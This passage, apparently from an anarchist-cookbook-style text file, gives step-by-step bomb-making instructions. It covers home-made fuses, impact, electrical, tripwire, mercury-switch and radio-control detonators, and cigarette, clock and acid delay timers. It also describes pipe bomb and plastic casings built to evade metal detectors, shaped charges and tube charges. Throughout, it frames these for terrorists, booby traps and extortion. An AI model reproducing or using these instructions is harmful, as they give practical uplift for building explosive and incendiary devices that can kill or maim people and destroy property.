degree oven or tie it to a grill in the oven and let it hang down.  The fuse
must be baked to make it stiff enough for the uses it will be put to later.
Air drying will not do the job.  If you used Sodium Nitrate, it will not even
dry completely at room temperatures.

Cut the dry fuse with sissors into 2 inch lengths and store in an air tight
container.  Handle this fuse carefuly to avoid breaking it.  You can also use
a firecracker fuse if you have any available.  The fuses can usually be pulled
out without breaking.  To give yourself some running time, you will be
extending these fuses (blackmatch or firecracker fuse) with sulfured wick.

    Finally, it is possible to make a relatively slow-burning fuse in the
home. By dissolving about one teaspoon of black powder in about 1/4 a cup of
boiling water, and, while it is still hot, soaking in it a long piece of all
cotton string, a slow-burning fuse can be made. After the soaked string dries,
it must then be tied to the fuse of an explosive device. Sometimes, the end of
the slow burning fuse that meets the normal fuse has a charge of black powder
or gunpowder at the intersection point to insure ignition, since the
slow-burning fuse does not burn at a very high temperature.

 A similar type of slow fuse can be made by taking the above mixture of
boiling water and black powder and pouring it on a long piece of toilet paper.
The wet toilet paper is then gently twisted up so that it resembles a
firecracker fuse, and is allowed to dry.


4.21.2           HOW TO MAKE SULFURED WICK

   Use heavy cotton string about 1/8th inch in diameter.  You can find some at
a garden supply for tieing up your tomatoes.  Be sure it's cotton.  You can
test it by lighting one end.  It sould continue to burn after the match is
removed and when blown out will have a smoldering coal on the end.  Put some
sulfur in a small container like a small pie pan and melt it in the oven at
250 degrees.

    It will melt into a transparent yellow liquid.  If it starts turning
brown, it is too hot.  Coil about a one foot length of string into it.  The
melted sulfur will soak in quickly.  When saturated, pull it out and tie it up
to cool and harden.

  It can be cut to desired lengths with sissors.  2 inches is about right.
These wicks will burn slowly with a blue flame and do not blow out easily in a
moderate wind. They will not burn through a hole in a metal pipe, but are
great for extending your other fuse.  They will not throw off sparks.
Blackmatch generates sparks which can ignite it along its length causing
unpredictable burning times.


4.22     IMPACT IGNITION

     Impact ignition is an excellent method of ignition for spontaneous
terrorist activities.  The problem with an impact-detonating device is that it
must be kept in a very safe container so that it will not explode while being
transported to the place where it is to be used.  This can be done by having a
removable impact initiator.

     The best and most reliable impact initiator is one that uses factory made
initiators or primers. A no. 11 cap for black powder firearms is one such
primer. They usually come in boxes of 100, and cost about $2.50. To use such a
cap, however, one needs a nipple that it will fit on. Black powder nipples are
also available in gun stores. All that a person has to do is ask for a package
of nipples and the caps that fit them.  Nipples have a hole that goes all the
way through them, and they have a threaded end, and an end to put the cap on.
A cutaway of a nipple is shown below:

(Ill. 4.22)
                          ________________
                         |                |
                _        |                |
               | |       |/\/\/\/\/\/\/\/\|
        _______| |^^^^^^^|
       |      ___________|
       |     |
no. 11       |_______|
percussion    _______                       ------- threads for screwing
    cap              :
    here     |__________                              nipple onto bomb
       |____            |
            | |^^^^^^^^^|
            |_|         |/\/\/\/\/\/\/\/\/|
                        |                 |
                        |_________________|


     When making using this type of initiator, a hole must be drilled into
whatever container is used to make the bomb out of. The nipple is then screwed
into the hole so that it fits tightly. Then, the cap can be carried and placed
on the bomb when it is to be thrown. The cap should be bent a small amount
before it is placed on the nipple, to make sure that it stays in place.  The
only other problem involved with an impact detonating bomb is that it must
strike a hard surface on the nipple to set it off. By attaching fins or a
small parachute on the end of the bomb opposite the primer, the bomb, when
thrown, should strike the ground on the primer, and explode. Of course, a bomb
with mercury fulminate in each end will go off on impact regardless of which
end it strikes on, but mercury fulminate is also likely to go off if the
person carrying the bomb is bumped hard.


4.22.1       MAGICUBE IGNITOR

      A VERY SENSITIVE and reliable impact iniator can be  produced from the
common MAGICUBE ($2.40 for 12) type flashbulbs. Simply crack the plastic
cover off, remove the reflector, and you will see 4 bulbs, each of which has
a small metal rod holding it in place.

     CAREFULLY grasp this rod with a pair of needle-nose pliers, and pry gently
upwards, making sure that NO FORCE IS APPLIED TO THE GLASS BULB.

     Each bulb is coated with plastic, which must be removed for them to be
effective in our application. This coating can be removed by soaking the
bulbs in a small glass of acetone for 30-45 minutes, at which point the
plastic can be easily peeled away.

     The best method to use these is to dissolve some nitrocellulose based
smokeless powder in acetone and/or ether, forming a thich glue-like paste.
Coat the end of the fuse with this paste, then stick the bulb (with the metal
rod facing out) into the paste. About half the bulb should be completely
covered, and if a VERY THIN layer of nitrocellulose is coated over the
remainder then ignition should be very reliable.

     To insure that the device lands with the bulb down, a small streamer
can be attached to the opposite side, so when it is tossed high into the air
the appropriate end will hit the ground first.


4.23     ELECTRICAL IGNITION

     Electrical ignition systems for detonation are usually the safest and
most reliable form of ignition. Electrical systems are ideal for demolition
work, if one doesn't have to worry so much about being caught. With two spools
of 500 ft of wire and a car battery, one can detonate explosives from a
"safe", comfortable distance, and be sure that there is nobody around that
could get hurt. With an electrical system, one can control exactly what time a
device will explode, within fractions of a second. Detonation can be aborted
in  less than a second's warning, if a person suddenly walks by the detonation
sight, or if a police car chooses to roll by at the time. The two best
electrical igniters are military squibs and model rocketry igniters. Blasting
caps for construction also work well. Model rocketry igniters are sold in
packages of six, and cost about $1.00 per pack. All that need be done to use
them is connect it to two wires and run a current through them. Military
squibs are difficult to get, but they are a little bit better, since they
explode when a current is run through them, whereas rocketry igniters only
burst into flame. Most squibs will NOT detonate KClO3/petroleum jelly or RDX.
This requires a blasting cap type detonation in most cases.  There are,
however, military explosive squibs which will do the job.

Igniters can be used to set off black powder, mercury fulminate, or guncotton,
which in turn, can set of a high order explosive.


4.23.1    HOW TO MAKE AN ELECTRIC FUZE    (By Capt. Hack & GW)

   Take a flashlight bulb and place it glass tip down on a file.  Grind it
down on the file until there is a hole in the end. Solder one wire to the case
of the bulb and another to the center conductor at the end.  Fill the bulb
with black powder or powdered match head. One or two flashlight batteries will
heat the filament in the bulb causing the powder to ignite.


4.23.2    ANOTHER ELECTRIC FUZE

    Take a medium grade of steel wool and pull a strand out of it.  Attach it
to the ends of two pieces of copper wire by wrapping it around a few turns and
then pinch on a small piece of solder to bind the strand to the wire. You want
about 1/2 inch of steel strand between the wires.  Number 18 or 20 is a good
size wire to use.
     Cut a 1/2 by 1 inch piece of cardboard of the type used in match covers.
Place a small pile of powdered match head in the center and press it flat.
place the wires so the steel strand is on top of and in contact with the
powder. Sprinkle on more powder to cover the strand.
     The strand should be surounded with powder and not touching anything else
except the wires at its ends. Place a piece of blackmatch in contact with the
powder.  Now put a piece of masking tape on top of the lot, and fold it under
on the two ends.  Press it down so it sticks all around the powder.
      The wires are sticking out on one side and the blackmatch on the other.
A single flashlight battery will set this off.

4.24     ELECTRO-MECHANICAL IGNITION

     Electro-mechanical ignition systems are systems that use some type of
mechanical switch to set off an explosive charge electrically.  This type of
switch is typically used in booby traps or other devices in which the person
who places the bomb does not wish to be anywhere near the device when it
explodes. Several types of electro-mechanical detonators will be discussed

4.24.1     Mercury Switches

     Mercury switches are a switch that uses the fact that mercury metal
conducts electricity, as do all metals, but mercury metal is a liquid at room
temperatures. A typical mercury switch is a sealed glass tube with two
electrodes and a bead of mercury metal. It is sealed because of mercury's
nasty habit of giving off brain-damaging vapors. The diagram below may help to
explain a mercury switch.

(Ill. 4.24.1)
                         ______________
                     A  /              \   B
      _____wire +______/_________       \
                       \   ( Hg   )|    /
                        \ _(_Hg___)|___/
                                   |
                                   |
                            wire - |
                                   |
                                   |

     When the drop of mercury ("Hg" is mercury's atomic symbol) touches both
contacts, current flows through the switch.  If this particular switch was in
its present position, A---B, current would be flowing, since the mercury can
touch both contacts in the horizontal position.

     If, however, it was in the | position, the drop of mercury would only
touch the + contact on the A side. Current, then couldn't flow, since mercury
does not reach both contacts when the switch is in the vertical position. This
type of switch is ideal to place by a door. If it were placed in the path of a
swinging door in the verticle position, the motion of the door would knock the
switch down, if it was held to the ground by a piece if tape. This would tilt
the switch into the verticle position, causing the mercury to touch both
contacts, allowing current to flow through the mercury, and to the igniter or
squib in an explosive device.


4.24.2     Tripwire Switches

     A tripwire is an element of the classic booby trap.  By placing a nearly
invisible line of string or fishing line in the probable path of a victim, and
by putting some type of trap there also, nasty things can be caused to occur.
If this mode of thought is applied to explosives, how would one use such a
tripwire to detonate a bomb.  The technique is simple.  By wrapping the tips
of a standard clothespin with aluminum foil, and placing something between
them, and connecting wires to each aluminum foil contact, an electric tripwire
can be made,  If a piece of wood attached to the tripwire was placed between
the contacts on the clothespin, the clothespin would serve as a switch.  When
the tripwire was pulled, the clothespin would snap together, allowing current
to flow between the two pieces of aluminum foil, thereby completing a circuit,
which would have the igniter or squib in it.  Current would flow between the
contacts to the igniter or squib, heat the igniter or squib, causing it it to
explode. Make sure that the aluminum foil contacts do not touch the spring,
since the spring also conducts electricity.


4.243     Radio Control Detonators

     In the movies, every terrorist or criminal uses a radio controlled
detonator to set off explosives.  With a good radio detonator, one can be
several miles away from the device, and still control exactly when it
explodes, in much the same way as an electrical switch.  The problem with
radio detonators is that they are rather costly.  However, there could
possibly be a reason that a terrorist would wish to spend the amounts of money
involved with a RC (radio control) system and use it as a detonator.  If such
an individual wanted to devise an RC detonator, all he would need to do is
visit the local hobby store or toy store, and buy a radio controlled toy.
Taking it back to his/her abode, all that he/she would have to do is detach
the solenoid/motor that controls the motion of the front wheels of a RC car,
or detach the solenoid/motor of the elevators/rudder of a RC plane, or the
rudder of a RC boat, and re-connect the squib or rocket engine igniter to the
contacts for the solenoid/motor.  The device should be tested several times
with squibs or igniters, and fully charged batteries should be in both he
controller and the receiver (the part that used to move parts before the
device became a detonator).

4.3     DELAYS

     A delay is a device which causes time to pass from when a device is set
up to the time that it explodes.  A regular fuse is a delay, but it would cost
quite a bit to have a 24 hour delay with a fuse.  This section deals with the
different types of delays that can be employed by a terrorist who wishes to be
sure that his bomb will go off, but wants to be out of the country when it
does.


4.31     FUSE DELAYS

     It is extremely simple to delay explosive devices that employ fuses for
ignition.  Perhaps the simplest way to do so is with a cigarette.  An average
cigarette burns for between 8-11 minutes. The higher the "tar" and nicotine
rating, the slower the cigarette burns. Low "tar" and nicotine cigarettes burn
quicker than the higher "tar" and nicotine cigarettes, but they are also less
likely to go out if left unattended, i.e. not smoked. Depending on the wind or
draft in a given place, a high "tar" cigarette is better for delaying the
ignition of a fuse, but there must be enough wind or draft to give the
cigarette enough oxygen to burn. People who use cigarettes for the purpose of
delaying fuses will often test the cigarettes that they plan to use in advance
to make sure they stay lit and to see how long it will burn. Once a cigarettes
burn rate is determined, it is a simple matter of carefully putting a hole all
the way through a cigarette with a toothpick at the point desired, and pushing
the fuse for a device in the hole formed.

(Ill 4.31)

                            |=|
                            |=| ---------- filter
                            |=|
                            | |
                            | |
                            |o| ---------- hole for fuse
 cigarette ------------     | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            |_| ---------- light this end

4.31.1   IMPROVED CIGARETTE DELAY                (By Atur {THE pyromaniac })

     A variation on the standard cigarette display was invented by my good
friend Atur (THE Pyromaniac). Rather than inserting the fuse into the SIDE
of the cigarette (and risk splitting it) half of the filter is cut off, and a
small hole is punched THROUGH the remainder of the filter and into the
tobacco.

(Ill. 4.31.1)

     ---------------------------------
     |FIL|Tobacco   Tobacco    Tobacco   
 fusefusefusefuse   Tobacco    Tobacco    side view
     |TER|Tobacco   Tobacco    Tobacco
     ---------------------------------
         ___
        /   \
        | o |    filter end view
        \___/                                (artwork by The Author)


     The fuse is inserted as far as possible into this hole, then taped or
glued in place, or the cigarette can be cut and punched ahead of time and
lit normally, then attached to the fuse at the scene.

     A similar type of device can be make from powdered charcoal and a sheet
of paper.  Simply roll the sheet of paper into a thin tube, and fill it with
powdered charcoal. Punch a hole in it at the desired location, and insert a
fuse. Both ends must be glued closed, and one end of the delay must be doused
with lighter fluid before it is lit. Or, a small charge of gunpowder mixed
with powdered charcoal could conceivably used for igniting such a delay. A
chain of charcoal briquettes can be used as a delay by merely lining up a few
bricks of charcoal so that they touch each other, end on end, and lighting the
first brick. Incense, which can be purchased at almost any novelty or party
supply store, can also be used as a fairly reliable delay. By wrapping the
fuse about the end of an incense stick, delays of up to 1/2 an hour are
possible.
     

4.32     TIMER DELAYS

     Timer delays, or "time bombs" are usually employed by an individual who
wishes to threaten a place with a bomb and demand money to reveal its location
and means to disarm it.  Such a device could be placed in any populated place if
it were concealed properly.  There are several ways to build a timer delay. By
simply using a screw as one contact at the time that detonation is desired, and
using the hour hand of a clock as the other contact, a simple timer can be made.
The minute hand of a clock should be removed, unless a delay of less than an
hour is desired.

     The main disadvantage with this type of timer is that it can only be set
for a maximum time of 12 hours.  If an electronic timer is used, such as that
in an electronic clock, then delays of up to 24 hours are possible.  By
removing the speaker from an electronic clock, and attaching the wires of a
squib or igniter to them, a timer with a delay of up to 24 hours can be made.
All that one has to do is set the alarm time of the clock to the desired time,
connect the leads, and go away.  This could also be done with an electronic
watch, if a larger battery were used, and the current to the speaker of the
watch was stepped up via a transformer.  This would be good, since such a
timer could be extremely small.

 The timer in a VCR (Video Cassette Recorder) would be ideal.  VCR's can
usually be set for times of up to a week.  The leads from the timer to the
recording equipment would be the ones that an igniter or squib would be
connected to.  Also, one can buy timers from electronics stores that would be
work well.  Finally, one could employ a digital watch, and use a relay, or
electro-magnetic switch to fire the igniter, and the current of the watch
would not have to be stepped up.


4.33     CHEMICAL DELAYS

     Chemical delays are uncommon, but they can be extremely effective in some
cases. These were often used in the bombs the Germans dropped on England. The
delay would ensure that a bomb would detonate hours or even days after the
initial bombing raid, thereby increasing the terrifying effect on the British
citizenry.

  If a glass container is filled with concentrated sulfuric acid, and capped
with several thicknesses of aluminum foil, or a cap that it will eat through,
then it can be used as a delay.  Sulfuric acid will react with aluminum foil
to produce aluminum sulfate and hydrogen gas, and so the container must be
open to the air on one end so that the pressure of the hydrogen gas that is
forming does not break the container.

(Ill. 4.33)
                _               _
               | |             | |
               | |             | |
               | |             | |
               | |_____________| |
               | |             | |
               | |  sulfuric   | |
               | |             | |
               | |  acid       | |
               | |             | |---------- aluminum foil
               | |_____________| |           (several thicknesses)               
               |_________________|


     The aluminum foil is placed over the bottom of the container and secured
there with tape.  When the acid eats through the aluminum foil, it can be used
to ignite an explosive device in several ways.

1) Sulfuric acid is a good conductor of electricity.  If the acid that eats
   through the foil is collected in a glass container placed underneath the
   foil, and two wires are placed in the glass container, a current will be
   able to flow through the acid when both of the wires are immersed in the
   acid.

2) Sulfuric acid reacts very violently with potassium chlorate. If the acid
   drips down into a container containing potassium chlorate, the potassium
   chlorate will burst into flame.  This flame can be used to ignite a fuse,
   or the potassium chlorate can be the igniter for a thermite bomb, if some
   potassium chlorate is mixed in a 50/50 ratio with the thermite, and this
   mixture is used as an igniter for the rest of the thermite.

3) Sulfuric acid reacts with potassium permangenate in a similar way.


4.331      MORE SPONTANEOUS COMBUSTION

 Some of the ingredients for these can only be had from a chemical supply so
they are not my favorites.  Look for powdered aluminum at a good painting
supply.

                                  METHOD # 1
 Scatter out a few crystals of chromic anhydride.  Drop on a little ethyl
alcohol.  It will burst into flame immediately.

                                  METHOD # 2
  Mix by weight, four parts ammonium chloride, one part ammonium nitrate, four
parts powered zinc.  Pour out a small pile of this and make a depression on
top.  Put one or two drops of water in the depression. Stay well back from
this.

                                  METHOD # 3
  Spoon out a small pile of powdered aluminum.  Place a small amount of sodium
peroxide on top of this.  A volume the size of a small pea is about right.
One drop of water will cause this to ignite in a blinding flare.

                                  METHOD # 4
  Mix by volume 3 parts concentrated sulfuric acid with 2 parts concentrated
nitric acid. Hold a dropper of turpentine about 2 feet above the mixture.
When drops strike the acid they will burst into flame.

4.4     EXPLOSIVE CASINGS

     This section will cover everything from making a simple firecracker to a
complicated scheme for detonating an insensitive high explosive, both of which
are methods that could be utilized by perpetrators of terror.


4.41     PAPER CONTAINERS

     Paper was the first container ever used for explosives, since it was
first used by the Chinese to make fireworks. Paper containers are usually very
simple to make, and are certainly the cheapest. There are many possible uses
for paper in containing explosives, and the two most obvious are in
firecrackers and rocket engines. Simply by rolling up a long sheet of paper,
and gluing it together, one can make a simple rocket engine. Perhaps a more
interesting and dangerous use is in the firecracker. The firecracker shown
here is one of Mexican design. It is called a "polumna", meaning "dove". The
process of their manufacture is not unlike that of making a paper football. If
one takes a sheet of paper about 16 inches in length by 1.5 inches wide, and
fold one corner so that it looks like this:

(Ill 4.41)
       ________________________________________________
       |                                             |\
       |                                             | \
       |                                             |  \
       |_____________________________________________|___\

       and then fold it again so that it looks like this:

       ______________________________________________
       |                                           /|
       |                                          / |
       |                                         /  |
       |________________________________________/___|

      A pocket is formed.  This pocket can be filled with black powder,
pyrodex, flash powder, gunpowder,rocket engine powder, or any of the
quick-burning fuel- oxodizer mixtures that occur in the form of a fine powder.
A fuse is then inserted, and one continues the triangular folds, being careful
not to spill out any of the explosive.  When the polumna is finished, it
should be taped together very tightly, since this will increase the strength
of the container, and produce a louder and more powerful explosion when it is
lit.  The finished polumna should look like a 1/4 inch - 1/3 inch thick
triangle, like the one shown below:


(Ill. 4.41)
             ^
            / \  ----- securely tape all corners
           /   \
          /     \
         /       \
        /         \
       /           \____________________________
      /_____________\__/__/__/__/__/__/__/__/__/  ---------- fuse


4.42     METAL CONTAINERS

     The classic pipe bomb is the best known example of a metal-contained
explosive.  Idiot anarchists take white tipped matches and cut off the match
heads.  They pound one end of a pipe closed with a hammer, pour in the white-
tipped matches, and then pound the other end closed.  This process often kills
the fool, since when he pounds the pipe closed, he could very easily cause
enough friction between the match heads to cause them to ignite and explode
the unfinished bomb.  By using pipe caps, the process is somewhat safer, and
the less stupid anarchist would never use white tipped matches in a bomb.
Regular matches may still be ignited by friction, but it is far less likely
than with "strike-anywhere" matches.

     He would buy two pipe caps and threaded pipe.  First, he would drill a
hole in one pipe cap, and put a fuse in it so that it will not come out, and
so powder will not escape during handling.  The fuse would be at least 3/4 an
inch long inside the bomb.  He would then screw the cap with the fuse in it on
tightly, possibly putting a drop of super glue on it to hold it tight.  He
would then pour his explosive powder in the bomb.  To pack it tightly, he
would take a large wad of tissue paper and, after filling the pipe to the very
top, carefully pack the powder down, by using the paper as a ramrod tip, and
pushing it with a pencil or other wide ended object, until it would not move
any further.

    Finally, he would screw the other pipe cap on, and glue it. The tissue
paper would help prevent some of the powder from being caught in the threads
of the pipe or pipe cap from being crushed and subject to friction, which
might ignite the powder, causing an explosion during manufacture. An assembled
bomb is shown in fig. 4.42

(Ill. 4.42)
          ________                                ________
          | _____|________________________________|_____ |
          | |__________________________________________| |
          | |: : : : |- - - - - - - - - - - - - - - - -| |
          | | tissue | - - - - - - - - - - - - - - - - |_|
          | | : : :  |- - - low order explosive - - ----------------------       
          | | paper  | - - - - - - - - - - - - - - - - |-|    fuse
          | |: : : : |- - - - - - - - - - - - - - - - -| |
          | |________|_________________________________| |
          | |__________________________________________| |
          |______|                                |______|

          endcap                pipe               endcap
                                                   w/ hole

     fig. 2  Assembled pipe bomb.

 The metal caps are VERY difficult to drill holes in, it is much easier to
drill a hole into the middle of the pipe (BEFORE FILLING IT!!!) and place the
fuse there. Lionel (a friend of mine) has had great success with this design.
After detonating one of these inside a cookie tin, he found the lid about 1/2
block away, the sides of the tin blown out, and an impression of the pipe
(which was later found blown flat) threads and all on the bottom of the tin...
it seems that the welded seam gives out on most modern rolled pipes, however a
cast pipe (no seam) would produce more shrapnel (which may or may not be
desirable).

     This is one possible design that a mad bomber would use.  If, however, he
did not have access to threaded pipe with endcaps, he could always use a piece
of copper or aluminum pipe, since it is easily bent into a suitable position.
A major problem with copper piping, however, is bending and folding it without
tearing it; if too much force is used when folding and bending copper pipe, it
will split along the fold.  The safest method for making a pipe bomb out of
copper or aluminum pipe is similar to the method with pipe and endcaps.

4.42.1     PIPE BOMBS FROM SOFT METAL PIPES

   First, one flattens one end of a copper or aluminum pipe carefully, making
sure not to tear or rip the piping.  Then, the flat end of the pipe should be
folded over at least once, if this does not rip the pipe.  A fuse hole should
be drilled in the pipe near the now closed end, and the fuse should be
inserted.

    Next, the bomb- builder would partially fill the casing with a low order
explosive, and pack it with a large wad of tissue paper.  He would then
flatten and fold the other end of the pipe with a pair of pliers.  If he was
not too dumb, he would do this slowly, since the process of folding and
bending metal gives off heat, which could set off the explosive.  A diagram is
presented below:

(Ill. 4.42.1 #1)
                                                 ________
 _______________________________________________/|      |
|       |                                    o   |      |
|______________________________________________  |      |
                                               \_|______|

     fig. 1  pipe with one end flattened and fuse hole drilled (top view)

(Ill. 4.42.1 #2)
                                                  ______
     ____________________________________________/  |  |
     |                                              |  |
     |                                            o |  |
     |___________________________________________   |  |
                                                 \__|__|

     fig. 2  pipe with one end flattened and folded up (top view)

(Ill. 4.42.1 #3)
                              ____________ fuse hole
                              v
     _______________________________  ______
     |                             \  |___ |
     |                              \____| |
     |                               ______|
     |                              /
     |_____________________________/

     fig. 3  pipe with flattened and folded end (side view)


4.42.2   CARBON DIOXIDE "Pellet Gun" or Seltzer cartridges.

      A CO2 cartridge from a B.B gun is another excellent container for a low-
order explosive.  It has one minor disadvantage: it is time consuming to fill.
But this can be rectified by widening the opening of the cartridge with a
pointed tool.  Then, all that would have to be done is to fill the CO2
cartridge with any low-order explosive, or any of the fast burning
fuel-oxodizer mixtures, and insert a fuse.  These devices are commonly called
"crater makers".

    From personal experience, I have found that a CO2 cartridge is easiest to
fill if you take a piece of paper and tape it around the opening to form a
sort of funnel:

(Ill 4.42.2)

A full      \     /   Use a punch or sharp philips (+) screwdriver to
cartridge    \   /  enlarge the pin-hole opening on a used cartridge.
can also be   \ /
fun-           @    It doesn't seem to be neccessary to seal the hole,
              / \  but if you must do so, Epoxy and electrical tape
toss it into |  |  work quite well.
a lite fire  |  |
and it will  (__)     CONDENSATION may form inside a recently used
explode, and            bottle- if you must use one right after emptying
the CO2 may             it, heat it in a warm oven to dry it out.
extinguish the flames.

     A CO2 cartridge also works well as a container for a thermite incendiary
device, but it must be modified. The opening in the end must be widened, so
that the ignition mixture, such as powdered magnesium, does not explode. The
fuse will ignite the powdered magnesium, which, in turn, would ignite the
thermite .

4.42.3   PRIMED EXPLOSIVE CASINGS


 The previously mentioned designs for explosive devices are fine for low-
order explosives, but are unsuitable for high-order explosives, since the
latter requires a shockwave to be detonated. A design employing a smaller
low-order explosive device inside a larger device containing a high-order
explosive would probably be used.

(Ill. 4.42.3)
      _____________________________________
     |                           _        |
     |                          / \       |
     | High Explosive filler   |LO =======
     |                          \_/       |
     |____________________________________|


     If the large high explosive container is small, such as a CO2 cartridge,
then a segment of a hollow radio antenna can be made into a low-order pipe bomb,
which can be fitted with a fuse, and inserted into the CO2 cartridge.

4.43     GLASS CONTAINERS

     Glass containers can be suitable for low-order explosives, but there are
problems with them.  First, a glass container can be broken relatively easily
compared to metal or plastic containers.  Secondly, in the not-too-unlikely
event of an "accident", the person making the device would probably be
seriously injured, even if the device was small.  A bomb made out of a sample
perfume bottle-sized container exploded in the hands of one boy, and he still
has pieces of glass in his hand.  He is also missing the final segment of his
ring finger, which was cut off by a sharp piece of flying glass...

     Nonetheless, glass containers such as perfume bottles can be used by a
demented individual, since such a device would not be detected by metal
detectors in an airport or other public place.  All that need be done is fill
the container, and drill a hole in the plastic cap that the fuse fits tightly
in, and screw the cap-fuse assembly on.

(Ill. 4.43)
                    ________________________  fuse
                    |
                    |
                    |
               _____|_____
               | ___|___ |
               | >  |  < |  drill hole in cap, and insert fuse;
               | >  |  < |  be sure fuse will not come out of cap                | > 
               | <  |  < |
               |    |    |
               |         |
               |         |
               |         |  screw cap on bottle
               |         |
               |         |
               V_________V

     Large explosive devices made from glass containers are not practicle,
since glass is not an exceptionally strong container.  Much of the explosive
that is used to fill the container is wasted if the container is much larger
than a 16 oz. soda bottle.  Also, glass containers are usually unsuitable for
high explosive devices, since a glass container would probably not withstand
the explosion of the initiator; it would shatter before the high explosive was
able to detonate.

4.44     PLASTIC CONTAINERS

     Plastic containers are perhaps the best containers for explosives, since
they can be any size or shape, and are not fragile like glass. Plastic piping
can be bought at hardware or plumbing stores, and a device much like the ones
used for metal containers can be made. The high-order version works well with
plastic piping. If the entire device is made out of plastic, it is not
detectable by metal detectors. Plastic containers can usually be shaped by
heating the container, and bending it at the appropriate place. They can be
glued closed with epoxy or other cement for plastics. Epoxy alone can be used
as an endcap, if a wad of tissue paper is placed in the piping. Epoxy with a
drying agent works best in this type of device.

(Ill. 4.44)    ||               ||
               ||               ||
               ||\_____________/||
               ||               ||
               ||     epoxy     ||
               ||_______________||
               ||    tissue     ||
               ||     paper     ||
               ||_______________||
               ||***************||
               ||***************||
               ||***************||
               ||***************||
               ||** explosive **||
               ||***************||
               ||***********-----------------------  fuse
               ||***************||
               ||ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ||
               ||               ||
               ||    tissue     ||
               ||     paper     ||
               ||_______________||
               ||               ||
               ||     epoxy     ||
               || _____________ ||
               ||/             \||
               ||               ||
               ||               ||


     One end must be made first, and be allowed to dry completely before the
device can be filled with powder and fused.  Then, with another piece of
tissue paper, pack the powder tightly, and cover it with plenty of epoxy.  PVC
pipe works well for this type of device, but it cannot be used if the pipe had
an inside diameter greater than 3/4 of an inch.  Other plastic puttys can be
used in this type of device, but epoxy with a drying agent works best.

     In my experience, epoxy plugs work well, but epoxy is somewhat expensive.
One alternative is auto body filler, a grey paste which, when mixed with
hardener, forms into a rock-like mass which is stronger than most epoxy. The
only drawback is the body filler generates quite a bit of heat as it hardens,
which might be enough to set of a overly sensitive explosive. One benefit of
body filler is that it will hold it's shape quite well, and is ideal for
forming rocket nozzles and entire bomb casings.


4.44.1      FILM CANISTERS               (By Bill)

For a relatively low shrapnel explosion, I suggest pouring it into an empty
35mm film cannister.  Poke a hole in the plastic lid for a fuse.  These
goodies make an explosion audible a mile away easily.

1) Poke the hole before putting the flash powder into the cannister.
2) Don't get any powder on the lip of the cannister.
3) Only use a very small quantity and work your way up to the desired
   result.                  
4) Do not pack the powder, it works best loose.
5) Do not grind or rub the mixture - it is friction sensitive.
6) Use a long fuse.

                                                Bill


4.5     ADVANCED USES FOR EXPLOSIVES

     The techniques presented here are those that could be used by a person
who had some degree of knowledge of the use of explosives.  Some of this
information comes from demolitions books, or from military handbooks.
Advanced uses for explosives usually involved shaped charges, or utilize a
minimum amount of explosive to do a maximum amount of damage.  They almost
always involve high- order explosives.

4.51     SHAPED CHARGES

     A shaped charge is an explosive device that, upon detonation, directs the
explosive force of detonation at a small target area. This process can be used
to breach the strongest armor, since forces of literally millions of pounds of
pressure per square inch can be generated. Shaped charges employ high-order
explosives, and usually electric ignition systems. KEEP IN MIND THAT ALL
EXPLOSIVES ARE DANGEROUS, AND SHOULD NEVER BE MADE OR USED!!

               An example of a shaped charge is shown below.

(Ill. 4.51)
                  + wire ________           _______ - wire
 _                      _________|_________|____________
 ^                     | ________|_________|__________ |
 |                     | |       |         |         | |
 |                     | |       \ igniter /         | |
 |                     | |        \_______/          | |
 |                     | |     priming charge        | |
 |                     | |   (mercury fulminate)     | |
 |                     | |             ^             | |
 |                     | |            / \            | |
 |                     | |           /   \           | |
 |                     | |          /     \          | |
 |                     | |         /       \         | |
 |                     | |        /         \        | |
 |                     | |       /           \       | |
                       | |      /             \      | |
 8 inches high         | |     /               \     | |
                       | |    /       high      \    | |
 |                     | |   /      explosive    \   | |
 |                     | |  /        charge       \  | |
 |                     | | /                       \ | |
 |                     | |/                         \| |
 |                     | |             ^             | |
 |                     | |            / \            | |
 |                     | |           /   \           | |
 |                     | |          /     \          | |
 |                     | |         /       \         | |
 |                     | |        /         \        | |
 |                     | |       /           \       | |
 |                     | |      /             \      | |
 |                     | |     /               \     | |
 |                     | |    /                 \    | | ------- 1/2 inch
 |                     | |   /                   \   | |         thick steel
 |                     | |  /                     \  | |         pipe
 |                     | | /                       \ | |
 |                     | |/                         \| |
 |      hole for       | |                           | |     hole for
 |      screw          | |                           | |      screw
 V_______   ___________| |                           | |___________  ________
 |______|   |____________|                           |_____________| |______|

                         |<------- 8 inches -------->|

     If a device such as this is screwed to a safe, for example, it would
direct most of the explosive force at a point about 1 inch away from the
opening of the pipe. The basis for shaped charges is a cone-shaped opening in
the explosive material.  This cone should have an angle of 45 degrees.  A
device such as this one could also be attached to a metal surface with a
powerful electromagnet.


4.52     TUBE EXPLOSIVES

     A variation on shaped charges, tube explosives can be used in ways that
shaped charges cannot. If a piece of 1/2 inch plastic tubing was filled with a
sensitive high explosive like R.D.X., and prepared as the plastic explosive
container in section 4.44, a different sort of shaped charge could be
produced; a charge that directs explosive force in a circular manner. This
type of explosive could be wrapped around a column, or a doorknob, or a
telephone pole. The explosion would be directed in and out, and most likely
destroy whatever it was wrapped around. In an unbent state, a tube explosive
would look like this:

(Ill. 4.52)
               ||\____/||
               || epoxy||
               ||------||
               ||tissue||
               || paper||
               ||______||
               ||******||
               ||******||
               ||******||
               || RDX  ||
               ||*____*||
               ||*| s|*||
               ||*| q|*||
               ||*| u|*||
               ||*| i|*||
               ||*| b|*||
               ||*| b|*||
               ||*|__|*||
               ||__||__||
               ||tissue||
               || paper||
               ||--||--||
               || epoxy||
               ||  ||  ||
               ||/ || \||
               ||  ||  ||
                   ||_______ + wire ______________
                   |________ - wire ______________


     When an assassin or terrorist wishes to use a tube bomb, he must wrap it
around whatever thing he wishes to destroy, and epoxy the ends of the tube
bomb together.  After it dries, he/she can connect wires to the squib wires,
and detonate the bomb, with any method of electric detonation.


4.53     ATOMIZED PARTICLE EXPLOSIONS

     If a highly flammable substance is atomized, or, divided into very small
particles, and large amounts of it is burned in a confined area, an explosion
similar to that occurring in the cylinder of an automobile is produced. The
tiny droplets of gasoline burn in the air, and the hot gasses expand rapidly,
pushing the cylinder up. Similarly, if a gallon of gasoline was atomized and
ignited in a building, it is very possible that the expanding gassed would
push the walls of the building down. This phenomenon is called an atomized
particle explosion.

    If a person can effectively atomize a large amount of a highly flammable
substance and ignite it, he could bring down a large building, bridge, or
other structure. Atomizing a large amount of gasoline, for example, can be
